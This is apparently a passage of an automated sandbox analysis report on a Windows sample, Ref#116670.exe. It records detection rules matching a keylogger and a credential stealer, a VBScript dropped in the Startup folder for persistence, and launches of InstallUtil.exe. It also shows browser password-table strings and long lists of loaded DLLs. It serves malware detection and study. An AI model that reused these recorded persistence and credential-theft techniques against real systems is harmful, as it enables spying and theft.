                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Code function: 5_2_06160BC0 NtResumeThread,5_2_06160BC0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Code function: 5_2_06160BBA NtResumeThread,5_2_06160BBA
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Code function: 5_2_0618ECD8 NtProtectVirtualMemory,5_2_0618ECD8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Code function: 5_2_0618ECD0 NtProtectVirtualMemory,5_2_0618ECD0
                    Source: Ref#116670.exe | Static PE information: invalid certificate
                    Source: Ref#116670.exe, 00000000.00000002.2249245132.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.00000000026D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2270089173.0000000006700000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameVtlyqv.dll" vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000000.2037381017.00000000000E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRef.exe8 vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameVtlyqv.dll" vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.000000000288B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exe | Binary or memory string: OriginalFilenameRef.exe8 vs Ref#116670.exe
                    Source: Ref#116670.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Ref#116670.exe, GenericLogger.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: vdvfyt.exe.0.dr, GenericLogger.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                    Source: C:\Users\user\Desktop\Ref#116670.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                    Source: Ref#116670.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Ref#116670.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E48000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000299E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3289067719.00000000038CD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002980000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Ref#116670.exe | ReversingLabs: Detection: 18%
                    Source: C:\Users\user\Desktop\Ref#116670.exe | File read: C:\Users\user\Desktop\Ref#116670.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\Ref#116670.exe "C:\Users\user\Desktop\Ref#116670.exe"
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\Ref#116670.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
